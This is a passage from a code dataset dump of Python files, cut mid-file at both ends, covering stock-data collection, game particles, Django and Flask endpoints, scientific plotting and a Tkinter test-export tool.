-1.*(_mr_ri_faint(_ri_gr(grs))-_mr_gi(_gi_gr(grs),fehs[ii]))\n bovy_plot.bovy_plot(grs,\n ybright,\n '-',color=colors[ii],\n overplot=True)\n bovy_plot.bovy_plot(grs,\n yfaint,\n '--',color=colors[ii],\n overplot=True)\n bovy_plot.bovy_text(xlegend,ylegend+ii*dy,\n r'$[\\mathrm{Fe/H]=%+4.1f}$' % fehs[ii],\n color=colors[ii])\n bovy_plot.bovy_end_print(os.path.join(dir,'dm_juric_ivezic.'+_EXT))\n\nif __name__ == '__main__':\n import sys\n if len(sys.argv) > 2:\n plotJuricIvezicDiff(sys.argv[1])\n else:\n plotAnIvezicDiff(sys.argv[1])\n","sub_path":"py/plotAnIvezicDiff.py","file_name":"plotAnIvezicDiff.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"651375325","text":"# -*- coding:utf-8 -*- \r\n'''\r\nCreated on 2016/10/07\r\nData Collecting\r\n@author: Cruise Huang\r\n'''\r\nimport os.path\r\nfrom datetime import datetime,date,time,timedelta\r\nfrom functools import partial\r\nfrom multiprocessing.pool import Pool\r\n\r\nimport pandas as pd\r\n\r\nfrom tushare.stock import trading as td\r\nfrom tushare.stock import billboard as bb\r\nfrom tushare.stock import cons as ct\r\n\r\nimport config as cfg\r\nimport utils\r\n\r\n\r\ndef get_today_all_multi():\r\n ct._write_head()\r\n print('获取当日全部数据')\r\n multiFunc = partial(td._parsing_dayprice_json)\r\n with Pool(12) as p:\r\n results = p.map(multiFunc, range(1,ct.PAGE_NUM[0]))\r\n p.close()\r\n p.join()\r\n\r\n df = pd.DataFrame()\r\n for result in results:\r\n df=df.append(result, ignore_index=True);\r\n\r\n print('\\n获取当日全部数据结束')\r\n return df\r\n\r\ndef write_his(result, path):\r\n utils.msg('\\rWriting to:' + path)\r\n result.to_csv(path, encoding='utf8')\r\n\r\ndef get_his(symbol, write2disk):\r\n path2Stock = cfg.PATH_2_HIS_DATA + symbol +'.csv'\r\n if(os.path.exists(path2Stock) and \r\n datetime.fromtimestamp(os.path.getmtime(cfg.FILE_CODES)).date() == datetime.fromtimestamp(os.path.getmtime(path2Stock)).date()):\r\n return\r\n\r\n df = td.get_hist_data(code=symbol,start=None, end=None,\r\n ktype='D', retry_count=3, pause=0.001)\r\n df.insert(loc=0,column='code',value=symbol)\r\n\r\n if(write2disk and df is not None):\r\n write_his(df, path2Stock)\r\n\r\n\r\ndef get_hists_multi(symbols, write2disk=False, start=None, end=None,\r\n ktype='D', retry_count=1,\r\n pause=0.01):\r\n \"\"\"\r\n 批量获取历史行情数据,具体参数和返回数据类型请参考get_hist_data接口\r\n \"\"\"\r\n ct._write_head()\r\n print('批量获取历史行情数据')\r\n if isinstance(symbols, list) or isinstance(symbols, set) or isinstance(symbols, tuple) or isinstance(symbols, pd.Series):\r\n multiFunc = partial(get_his, write2disk=True)\r\n with Pool(8) as p:\r\n results = p.map(multiFunc, symbols)\r\n p.close()\r\n p.join()\r\n\r\n print('\\n批量获取历史行情数据结束')\r\n else:\r\n return None\r\n\r\n\r\ndef write_stockcodes():\r\n stockCodes = get_today_all_multi()\r\n stockCodes.to_csv(cfg.MAIN_DIR+'all_today.csv',encoding='utf8')\r\n stockCodes.to_csv(cfg.FILE_CODES, columns=['code','name'], encoding='utf8')\r\n\r\ndef write_all_his():\r\n loaded = pd.read_csv(cfg.FILE_CODES, dtype='str', encoding='utf8')\r\n get_hists_multi(loaded['code'], write2disk=True)\r\n\r\ndef read_his(code):\r\n utils.msg('\\rReading: '+code)\r\n\r\n codeHisPath = cfg.PATH_2_HIS_DATA + code+'.csv'\r\n\r\n if(os.path.exists(codeHisPath) == False):\r\n print('Path Not Exists:' + code)\r\n return None\r\n\r\n df = pd.read_csv(codeHisPath, dtype='str', encoding='utf8')\r\n return df\r\n\r\ndef read_all_his():\r\n loaded = pd.read_csv(cfg.FILE_CODES, dtype='str', encoding='utf8')\r\n allHis = pd.DataFrame()\r\n lastDay = pd.DataFrame()\r\n\r\n readFunc = partial(read_his)\r\n with Pool(16) as rp:\r\n results = rp.map(readFunc, loaded['code'])\r\n rp.close()\r\n rp.join()\r\n\r\n for stock in results:\r\n if(stock is None):\r\n continue\r\n utils.msg('\\rHandling: '+ stock.ix[0]['code'])\r\n allHis = allHis.append(stock,ignore_index=True)\r\n lastDay = lastDay.append(stock.head(1),ignore_index=True)\r\n\r\n return [allHis,lastDay]\r\n\r\n\r\ndef write_all_lastday(df):\r\n df.to_csv(cfg.MAIN_DIR+'stocks_his_lastday.csv', encoding='utf8')\r\n return df\r\n\r\ndef write_billboard():\r\n print('获取龙虎榜数据')\r\n path = utils.getPath(cfg.PATH_2_BILLBOARD)\r\n\r\n dateStr = (utils.now() + timedelta(days=1)).strftime('%Y%m%d')\r\n\r\n df5 = bb.cap_tops(days=5)\r\n #df5.to_csv(PATH_2_BILLBOARD+dateStr+'_5d.csv',encoding='utf8')\r\n df10 = bb.cap_tops(days=10)\r\n #df10.to_csv(PATH_2_BILLBOARD+dateStr+'_10d.csv',encoding='utf8')\r\n print('\\n获取龙虎榜数据结束')\r\n\r\n merged = df5.merge(df10, on=['code','name'],suffixes=('_5','_10'),how='outer')\r\n merged.to_csv(path+dateStr+'_merged.csv', encoding='utf8')\r\n\r\n\r\ndef main():\r\n now = utils.now()\r\n fileCount = len(os.listdir(cfg.PATH_2_HIS_DATA))\r\n \r\n if(os.path.exists(cfg.FILE_CODES) == False \r\n or (now.time() > time(hour=15) and datetime.fromtimestamp(os.path.getmtime(cfg.FILE_CODES)).date() < now.date())\r\n or fileCount < len(pd.read_csv(cfg.FILE_CODES, dtype='str', encoding='utf8'))):\r\n write_stockcodes()\r\n write_all_his()\r\n \r\n df = read_all_his()\r\n write_all_lastday(df[1])\r\n\r\n write_billboard()\r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"cruise/a_dc_dataCollect.py","file_name":"a_dc_dataCollect.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"583664634","text":"from utils import rectCollision\nfrom platform import *\nfrom random import randint\nfrom math import *\n\n#Used for when the brick is destroyed\nclass BrickParticle:\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = 10\n\t\tself.height = 10\n\n\t\tself.xVel = randint(-15,15)\n\t\tself.yVel = 10\n\t\tself.jumping = True\n\n\t\tself.color = \"blue\"\n\n\tdef handle(self, data):\n\t\tself.yVel -= 1\n\t\tself.jumping = True\n\n\t\tfor platform in data.tiles:\n\t\t\tplatform.collide(self)\n\n\t\t#Move Particle (part 2)\n\t\tif (self.jumping):\n\t\t\tself.y -= self.yVel\n\t\t\tself.x += self.xVel\n\t\telse:\n\t\t\tself.xVel = self.xVel * .9\n\t\t\tself.x += self.xVel\n\t\t\tself.yVel = 0\n\n\tdef draw(self, canvas, data):\n\t\tcanvas.create_rectangle(self.x - data.camX, self.y - data.camY, self.x + self.width - data.camX, self.y + self.height - data.camY, fill = self.color)\n\n#Used for when firebolt hits wall\nclass SmallFireDebris:\n\tdef __init__(self, x, y, direction):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = 5\n\t\tself.height = 5\n\t\tself.direction = direction\n\t\tself.color = \"red\"\n\n\t\tself.xVel = randint(1,10)\n\t\tself.yVel = randint(-5,5)\n\t\tself.jumping = True\n\t\tself.dissipateTime = randint(10,40)\n\t\tself.timer = 0\n\n\t\tif (self.direction == \"right\"):\n\t\t\tself.xVel = - self.xVel\n\n\tdef handle(self, data):\n\t\tif (self.yVel > 0):\n\t\t\tself.yVel -= 1\n\t\telse:\n\t\t\tself.yVel += 1\n\t\tself.jumping = True\n\n\t\tfor platform in data.tiles:\n\t\t\tplatform.collide(self)\n\n\t\t#Move particles part 2\n\t\tself.y += self.yVel\n\t\tself.x += self.xVel\n\t\tself.xVel = self.xVel*.8\n\n\t\tself.timer += 1\n\t\tif (self.timer == self.dissipateTime):\n\t\t\tdata.particles.remove(self)\n\n\tdef draw(self, canvas, data):\n\t\tcanvas.create_rectangle(self.x - data.camX, self.y - data.camY, self.x + self.width - data.camX, self.y + self.height - data.camY, fill = self.color)\n\n#Is created after electric strike hits the ground\nclass ElectricStrikeDebris:\n\tdef __init__(self, x, y, speed):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = 2\n\t\tself.height = 2\n\t\tself.color = \"blue\"\n\t\t\n\t\tself.yVel = 5\n\t\tself.accY = randint(12,20)/10\n\t\tself.speed = speed\n\t\tself.xVel = speed\n\n\t\tself.dissipateTime = randint(30, 50)\n\t\tself.timer = 0\n\n\tdef handle(self, data):\n\t\tself.yVel = self.yVel / self.accY\n\n\t\tself.xVel = self.xVel * .8\n\n\t\tself.x += self.xVel\n\t\tself.y -= self.yVel\n\n\t\tself.timer += 1\n\t\tif (self.timer >= self.dissipateTime):\n\t\t\tdata.particles.remove(self)\n\n\tdef draw(self, canvas, data):\n\t\tcanvas.create_rectangle(self.x - data.camX, self.y - data.camY, self.x + self.width - data.camX, self.y + self.height - data.camY, fill = self.color)\n\n#Used when zombie dies\nclass ZombieDeathParticle:\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = 5\n\t\tself.height = 5\n\t\tself.color = \"green\"\n\n\t\tself.xVel = randint(-5,5)\n\t\tself.yVel = -3\n\n\t\tself.timer = 0\n\t\tself.dissipateTime = 20\n\n\tdef handle(self, data):\n\t\tself.xVel = randint(-5,5)\n\t\tself.x += self.xVel\n\t\tself.y += self.yVel\n\n\t\tself.timer += 1\n\t\tif (self.timer >= self.dissipateTime):\n\t\t\tdata.particles.remove(self)\n\n\tdef draw(self, canvas, data):\n\t\tcanvas.create_rectangle(self.x - data.camX, self.y - data.camY, self.x + self.width - data.camX, self.y + self.height - data.camY, fill = self.color)\n\n\ndef init(data):\n\tdata.particles = []\n\ndef handler(data):\n\tfor particle in data.particles:\n\t\tparticle.handle(data)\n\ndef drawer(data, canvas):\n\tfor particle in data.particles:\n\t\tparticle.draw(canvas, data)","sub_path":"particles.py","file_name":"particles.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"308777709","text":"from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom .models import Juego\nfrom .serializers import JuegoSerializer\n\n\n# Create your views here.\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n@csrf_exempt\ndef juego_list(request):\n \"\"\"\n List all code serie, or create a new serie.\n \"\"\"\n if request.method == 'GET':\n juegos = Juego.objects.all()\n serializer = JuegoSerializer(juegos, many=True)\n return JSONResponse(serializer.data)\n\n elif request.method == 'POST':\n data = JSONParser().parse(request)\n serializer = JuegoSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JSONResponse(serializer.data, status=201)\n return JSONResponse(serializer.errors, status=400)\n\n@csrf_exempt\ndef juego_detail(request, pk):\n \"\"\"\n Retrieve, update or delete a serie.\n \"\"\"\n try:\n juego = Juego.objects.get(pk=pk)\n except Juego.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = JuegoSerializer(juego)\n return JSONResponse(serializer.data)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = JuegoSerializer(juego, data=data)\n if serializer.is_valid():\n serializer.save()\n return JSONResponse(serializer.data)\n return JSONResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n juego.delete()\n return HttpResponse(status=204)","sub_path":"juegos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"352597854","text":"from flask import Flask\r\nfrom flask import request\r\nfrom flask import jsonify\r\nfrom flask_cors import CORS, cross_origin\r\nimport json\r\nfrom Servidumbre_app import mainFuntion\r\n\r\napp = Flask(__name__)\r\nCORS(app, support_credentials=True)\r\n@app.route(\"/planos\",methods=['GET', 'POST'])\r\ndef genPlanos():\r\n data = json.loads(request.data)\r\n excelPath = data['excelPath']\r\n dxfPath = data['dxfPath']\r\n csvPath = data['csvPath']\r\n dirPath = data['dirPath']\r\n mainFuntion(excelPath, dxfPath, csvPath, dirPath)\r\n return jsonify(excelPath, dxfPath, csvPath, dirPath)\r\n\r\n@app.route(\"/auto\",methods=['GET', 'POST'])\r\ndef genAutho():\r\n data = json.loads(request.data)\r\n excelPath = data['excelPath']\r\n autoPath = data['autoPath']\r\n dirPath = data['dirPath']\r\n #AutoFunction(excelPath, autoPath, dirPath)\r\n return jsonify(excelPath, autoPath, dirPath)\r\n\r\n@app.route(\"/contrato\",methods=['GET', 'POST'])\r\ndef genContrato():\r\n data = json.loads(request.data)\r\n excelPath = data['excelPath']\r\n contratoPath = data['contratoPath']\r\n dirPath = data['dirPath']\r\n #AutoFunction(excelPath, contratoPath, dirPath)\r\n return jsonify(excelPath, contratoPath, dirPath)\r\n\r\n@app.route(\"/valorizacion\",methods=['GET', 'POST'])\r\ndef genValorizacion():\r\n data = json.loads(request.data)\r\n excelPath = data['excelPath']\r\n valorizacionPath = data['valorizacionPath']\r\n dirPath = data['dirPath']\r\n #ContratoFunction(excelPath, valorizacionPath, dirPath)\r\n return jsonify(excelPath, valorizacionPath, dirPath)\r\n\r\n@app.route(\"/recibo\",methods=['GET', 'POST'])\r\ndef genRecibo():\r\n data = json.loads(request.data)\r\n excelPath = data['excelPath']\r\n reciboPath = data['reciboPath']\r\n dirPath = data['dirPath']\r\n #ContratoFunction(excelPath, reciboPath, dirPath)\r\n return jsonify(excelPath, reciboPath, dirPath)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='127.0.0.1', port=5001)","sub_path":"src/py/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"144786614","text":"from sklearn import decomposition\nimport numpy as np\nimport pickle\n\nclass DictionaryBuilder():\n\n def __init__(self,dataFile,outputFile,size):\n data = np.loadtxt(open(dataFile,\"rb\"),delimiter=\",\",skiprows=0)\n dictionary = decomposition.MiniBatchDictionaryLearning(n_components=size, alpha=1, n_iter=500).fit(data)\n dictionaryData = pickle.dumps(dictionary)\n f = open(outputFile,\"w\")\n f.write(dictionaryData)\n f.close()","sub_path":"src/gold/learn/DictionaryBuilder.py","file_name":"DictionaryBuilder.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"632464899","text":"import webbrowser\n\nclass Movie():\n def __init__(self, movie_title, year_released, movie_storyline, poster_image, youtube_trailer):\n self.title = movie_title\n self.year = year_released\n self.storyline = movie_storyline\n self.poster_url = poster_image\n self.youtube_trailer_url = youtube_trailer\n\n def show_trailer(self):\n # To open a page in the browser\n webbrowser.open(self.youtube_trailer_url)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"548343911","text":"import numpy as np\nfrom netCDF4 import Dataset, num2date # to work with NetCDF files\nfrom os.path import expanduser\nimport matplotlib.pyplot as plt\nhome = expanduser(\"~\") # Get users home directory\nimport statsmodels.api as sm\nfrom scipy import stats\n\nimport xarray as xr\nimport pytz\nimport glob, os\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt \nimport matplotlib.dates as mdates\nimport datetime\nfrom dateutil import tz\nimport metpy.calc as mpcalc\nfrom metpy.units import units\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.ticker as ticker\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\n\nmatplotlib.rcParams.update({'font.size': 24})\n\n#Directory where sondes are stored\n#dir_profile = \"/media/ludo/DATA/google-drive/Thèse/EUREC4a/github/Input/Products/\"\n#path_to_sonde_profiles = os.path.join(dir_profile,\"rad_profiles_all_sondes_ERA.nc\")\n\ndir_profile = \"../output/rad_profiles\"\npath_to_sonde_profiles = os.path.join(dir_profile,\"rad_profiles.nc\")\n\nsonde_profiles = xr.open_dataset(path_to_sonde_profiles)\n\nsonde_BCO = sonde_profiles.where(sonde_profiles.platform==\"BCO\", drop=True)\n\ndef get_variables_day_to_day(profiles):\n\n data = profiles[\"q_rad\"]\n data[\"q_rad_sw\"] = profiles[\"q_rad_lw\"]\n data[\"q_rad_lw\"] = profiles[\"q_rad_sw\"]\n\n data[\"time\"] = profiles[\"launch_time\"]\n data = data.drop_vars([\"lay\",\"col\"])\n \n data = data.to_dataframe()\n data[\"time\"] = data[\"time\"].dt.tz_localize(pytz.UTC).dt.tz_convert('America/Barbados').dt.strftime(\"%Y%m%dT%H\")\n \n data[\"time\"] = pd.to_datetime(data[\"time\"], format=\"%Y%m%dT%H\")\n\n data = data.reset_index()\n data = data.set_index([\"time\",\"zlay\"])\n data = data.groupby([pd.Grouper(freq='1H', level='time', label=\"right\"), \n pd.Grouper(level='zlay')]).mean()\n \n #come back to xarray and get q_rad\n data = data.to_xarray()\n \n time = data.time.values\n zlay = data.zlay.values\n q_rad = np.transpose(data.q_rad.values)\n q_rad_sw = np.transpose(data.q_rad_lw.values)\n q_rad_lw = np.transpose(data.q_rad_sw.values)\n\n return time, zlay, q_rad, q_rad_lw, q_rad_sw\n\ndef plot_day_to_day(profiles):\n\n time, zlay, q_rad, q_rad_lw, q_rad_sw = get_variables_day_to_day(profiles)\n\n dates_list = [date for date in time]\n\n fig, ax = plt.subplots(3,1,figsize=(20,30))\n\n fig.subplots_adjust(left=0.1, bottom=0.2, right=0.9, top=0.9, wspace=0.2, hspace=0.2)\n\n pad=10\n fs=24\n loc=\"left\"\n fw=\"bold\"\n ax[0].set_title(r'a) Shortwave', loc=loc, pad=pad,fontsize=fs, fontweight=fw)\n ax[1].set_title(r'b) Longwave', loc=loc, pad=pad, fontsize=fs, fontweight=fw)\n ax[2].set_title(r'c) Net', loc=loc, pad=pad, fontsize=fs, fontweight=fw)\n\n ax[1].set_ylabel('Altitude (km)')\n ax[2].set_xlabel('Date')\n\n ymin=0\n ymax=10\n\n colormap = matplotlib.cm.get_cmap(\"RdBu_r\")\n val_min = -4\n val_max = 4\n\n zlay=zlay/1000\n\n ax[0].pcolormesh(dates_list, zlay, q_rad_sw, cmap=colormap,vmin=val_min, vmax=val_max)\n ax[1].pcolormesh(dates_list, zlay, q_rad_lw, cmap=colormap,vmin=val_min, vmax=val_max)\n im = ax[2].pcolormesh(dates_list, zlay, q_rad, cmap=colormap,vmin=val_min, vmax=val_max)\n\n myFmt = mdates.DateFormatter('%m-%d')\n\n ini = np.datetime64('2020-01-19 00:00:00')\n end = np.datetime64('2020-02-17 00:00:00')\n\n for k in range(3):\n ax[k].xaxis.set_major_formatter(myFmt)\n ax[k].set_ylim([0,ymax])\n ax[k].set_xlim([ini,end])\n\n for k in range(3):\n ticks = ax[k].get_xticks()\n ax[k].set_xticks(np.linspace(ticks[0], ticks[-1], 10))\n\n ax[0].tick_params(labelbottom=False)\n ax[1].tick_params(labelbottom=False)\n\n x,y,w,h = ax[2].get_position().bounds\n c_map_ax = fig.add_axes([x, y-0.25*h, 1*w, 0.06*h])\n cbar = fig.colorbar(im,cax=c_map_ax, orientation=\"horizontal\", extend=\"both\")\n cbar.ax.set_xlabel('Heating Rate (K/day)',color='k') # cbar legend \n\n fig.savefig('../Figures/Fig5_Day_to_day_variability.jpg')\n \nplot_day_to_day(sonde_BCO)\n","sub_path":"scripts/Fig4_Day_to_day_variability.py","file_name":"Fig4_Day_to_day_variability.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"142239648","text":"\nimport json\n\nclass ReadJson:\n\n def __init__(self,filename):\n self.filename='../data/'+filename\n\n def read_json(self):\n with open(self.filename,'r',encoding='utf-8') as f:\n return json.load(f)\n\nif __name__ == '__main__':\n # 读取登录数据的json\n # data = (ReadJson('login.json').read_json())\n # arrs = []\n # arrs.append(\n # (data.get(\"url\"), data.get(\"mobile\"), data.get(\"code\"), data.get(\"status_code\"), data.get(\"expect_result\")))\n # print(arrs)\n\n\n # 读取channel数据的接送\n # data = (ReadJson('channel.json').read_json())\n # arrs = []\n # arrs.append(\n # (data.get(\"url\"), data.get(\"headers\"), data.get(\"expect_code\"), data.get(\"message\")))\n # print(arrs)\n\n # 读取collect_article数据的接送\n # data = (ReadJson('collect_article.json').read_json())\n # arrs = []\n # arrs.append(\n # (data.get(\"url\"), data.get(\"headers\"), data.get(\"expect_code\"),data.get(\"data\") ,data.get(\"message\")))\n # print(arrs)\n\n # 读取article_cancle数据的接送\n data = (ReadJson('article_cancel.json').read_json())\n arrs = []\n arrs.append(\n (data.get(\"url\"), data.get(\"headers\"), data.get(\"expect_code\")))\n print(arrs)","sub_path":"tools/read_json.py","file_name":"read_json.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"388753476","text":"import tkinter\nfrom time import sleep\nfrom tkinter import ttk\nfrom tkinter import messagebox as mb\nfrom tkinter import filedialog\nfrom Spannedfile1.spannedfile1 import mainB\n\n\ndef spanned_file1(top, config):\n def upioad_file_logic():\n value1 = filename.get()\n value1 = str(value1).replace(\"/\", \"\\\\\")\n print(value1, type(value1))\n value2 = test_id.get()\n value3 = need_id.get()\n value4 = casedescription.get()\n value5 = casenature.get()\n value6 = stepid.get()\n value7 = resultid.get()\n value8 = status.get()\n value9 = casepath.get()\n\n def change_schedule(now_schedule, all_schedule):\n canvas.coords(fill_rec, (5, 5, 6 + (now_schedule / all_schedule) * 400, 25))\n window_upioad_file.update()\n x.set(str(round(now_schedule / all_schedule * 100, 2)) + '%')\n if round(now_schedule / all_schedule * 100, 2) == 100.00:\n x.set(\"完成\")\n\n canvas = tkinter.Canvas(window_upioad_file, width=400, height=30, bg=\"white\")\n canvas.place(x=10, y=550)\n x = tkinter.StringVar()\n # 进度条以及完成程度\n # out_rec = canvas.create_rectangle(5, 5, 105, 25, outline=\"blue\", width=1)\n fill_rec = canvas.create_rectangle(5, 5, 5, 25, outline=\"\", width=0, fill=\"green\")\n\n tkinter.Label(window_upioad_file, textvariable=x).place(x=420, y=560)\n\n '''\n 使用时直接调用函数change_schedule(now_schedule,all_schedule)\n 下面就模拟一下....\n '''\n\n for i in range(60):\n sleep(0.05)\n change_schedule(i, 99)\n\n if value1 == '选择附件位置':\n mb.showerror(\"错误\", \"未选择附件位置!\")\n else:\n try:\n massge = mainB(value1, value2, value3, value4, value5, value6, value7, value8, value9)\n config.configwrite(\"filepath\", value1)\n config.configwrite(\"url\", value2)\n config.configwrite(\"username\", value3)\n config.configwrite(\"password\", value4)\n config.configwrite(\"domain\", value5)\n config.configwrite(\"project\", value6)\n config.configwrite(\"testSetID\", value7)\n config.configwrite(\"status\", value8)\n config.configwrite(\"casepath\", value9)\n config.configwritesave()\n\n for i in range(61, 100):\n sleep(0.05)\n change_schedule(i, 99)\n\n mb.showinfo('提示', massge)\n except:\n mb.showerror(\"错误\", \"程序出错,请联系管理员!\")\n\n window_upioad_file.destroy()\n\n def file_path_tool():\n path_ = filedialog.askdirectory(initialdir=r'C:/')\n filename.set(path_)\n\n # 定义长在窗口上的窗口\n window_upioad_file = tkinter.Toplevel(top)\n window_upioad_file.geometry('600x600')\n window_upioad_file.title('生成文档')\n window_upioad_file.resizable(0, 0)\n\n filename = tkinter.StringVar()\n test_id = tkinter.StringVar()\n need_id = tkinter.StringVar()\n casedescription = tkinter.StringVar()\n casenature = tkinter.StringVar()\n stepid = tkinter.StringVar()\n resultid = tkinter.StringVar()\n status = tkinter.StringVar()\n casepath = tkinter.StringVar()\n\n if config.configread(\"filepath\") == '':\n filename.set('选择生成文档路径')\n else:\n filename.set(config.configread(\"filepath\"))\n tkinter.Label(window_upioad_file, text='文档路径: ').place(x=10, y=10)\n tkinter.Entry(window_upioad_file, width=50, textvariable=filename).place(x=90, y=10)\n btn_file_path_tool = tkinter.Button(window_upioad_file, text='..', command=file_path_tool)\n btn_file_path_tool.place(x=500, y=6)\n\n test_id.set(config.configread(\"url\"))\n tkinter.Label(window_upioad_file, text='Url: ').place(x=10, y=50)\n entry_test_id = tkinter.Entry(window_upioad_file, width=50, textvariable=test_id)\n entry_test_id.place(x=90, y=50)\n\n need_id.set(config.configread(\"username\"))\n tkinter.Label(window_upioad_file, text='Username: ').place(x=10, y=90)\n entry_need_id = tkinter.Entry(window_upioad_file, textvariable=need_id)\n entry_need_id.place(x=90, y=90)\n\n casedescription.set(config.configread(\"password\"))\n tkinter.Label(window_upioad_file, text='Password: ').place(x=10, y=130)\n entry_casedescription = tkinter.Entry(window_upioad_file, textvariable=casedescription, show=\"*\")\n entry_casedescription.place(x=90, y=130)\n\n casenature.set(config.configread(\"domain\"))\n tkinter.Label(window_upioad_file, text='Domain: ').place(x=10, y=170)\n entry_casenature = tkinter.Entry(window_upioad_file, textvariable=casenature)\n entry_casenature.place(x=90, y=170)\n\n stepid.set(config.configread(\"project\"))\n tkinter.Label(window_upioad_file, text='Project: ').place(x=10, y=210)\n entry_stepid = tkinter.Entry(window_upioad_file, textvariable=stepid)\n entry_stepid.place(x=90, y=210)\n\n resultid.set(config.configread(\"testSetID\"))\n tkinter.Label(window_upioad_file, text='TestSetID: ').place(x=10, y=250)\n entry_resultid = tkinter.Entry(window_upioad_file, textvariable=resultid)\n entry_resultid.place(x=90, y=250)\n\n casepath.set(config.configread(\"casepath\"))\n tkinter.Label(window_upioad_file, text='CasePath: ').place(x=10, y=290)\n entry_casepath = tkinter.Entry(window_upioad_file, width=50, textvariable=casepath)\n entry_casepath.place(x=90, y=290)\n\n indexnum = [\"Blocked\", \"Failed\", \"N/A\", \"No Run\", \"Not Completed\", \"Passed\"].index(config.configread(\"status\"))\n tkinter.Label(window_upioad_file, text=\"status:\").place(x=10, y=330)\n de = ttk.Combobox(window_upioad_file, textvariable=status, width=12, height=15)\n de.bind(\"<>\")\n de[\"value\"] = (\"Blocked\", \"Failed\", \"N/A\", \"No Run\", \"Not Completed\", \"Passed\")\n de.current(indexnum)\n de.place(x=90, y=330)\n\n str_ = '''\n *说明*: \n 1、url处需要填写QC的服务地址,例如:http://127.0.0.1:8080/qcbin\n 2、username处需要填写QC的登录账户名字\n 3、password处需要填写QC的登录账户密码\n 4、domain处需要填写QC的登录域\n 5、project处需要填写QC的登录项目\n 6、testSetID处需要填写QC的测试集id,进入qc找到要上传的测试集,点击详细信息,就能找到测试集id\n 7、CasePath处需要填写QC的测试路径(当testSetID不为空,优先选择testSetID)\n 7、生成多个测试集,中间用+号隔开例如:1234+5678+8520\n 8、status选择导出案例的状态\n '''\n\n tkinter.Label(window_upioad_file, text=str_, fg=\"red\", justify=\"left\").place(x=10, y=370)\n\n btn_comfirm_sign_up = tkinter.Button(window_upioad_file, text='开始生成', command=upioad_file_logic)\n btn_comfirm_sign_up.place(x=500, y=550)\n","sub_path":"Spannedfile1/spannedfileUI1.py","file_name":"spannedfileUI1.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"490905242","text":"from flask import Flask\nimport recognizer\n\n\napp = Flask(__name__)\n\n\n\n# geting and sending response to dialogflow\n@app.route('/', methods=['POST','GET'])\ndef webhook():\n\n name = recognizer.get_name()\n\n value = 'Hello'+ ' ' + name\n \n return value\n \n\n\n \n\n\n\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"487432539","text":"storage=[]\nfilename = \"DatList.txt\"\nwhile True:\n print(\"\"\"\n1)Create an entry.\n2)List all entries.\n3)Write to file.\n4)Read from file.\n5)Find an entry\n\"\"\")\n inpt = int(input(\"Select:\"))\n if inpt == 1:\n name = \"Name: \" + input(\"Name: \")\n phone = \"Phone: \" + input(\"Phone: \")\n storage.append(name)\n storage.append(phone)\n elif inpt == 2:\n print(\"\\n\")\n for i in range(int(len(storage)/2)):\n print(storage[i*2], storage[i*2+1])\n inpt = input(\"Press return to continue.\")\n elif inpt == 3:\n lst = \"\\n\"\n lst = lst.join(storage)\n fh = open(filename, mode=\"w\", encoding=\"utf-8\")\n fh.write(lst)\n fh.close()\n print(\"written \\n\")\n elif inpt == 4:\n storage =[]\n file = open(filename)\n for i in file:\n storage.append(i.strip())\n print(\"Loaded\")\n elif inpt == 5:\n inpt = input(\"Ask Jeeves:\")\n for i in range(len(storage)):\n if inpt in storage[i]:\n if i%2 == 0:\n print(storage[i])\n print(storage[i+1])\n else:\n print(storage[i-1])\n print(storage[i])\n print(\"\\n\")\n inpt = input(\"Press return to continue.\")\n","sub_path":"PHONELIST.py","file_name":"PHONELIST.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"42148202","text":"import re\nimport time\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.management.base import 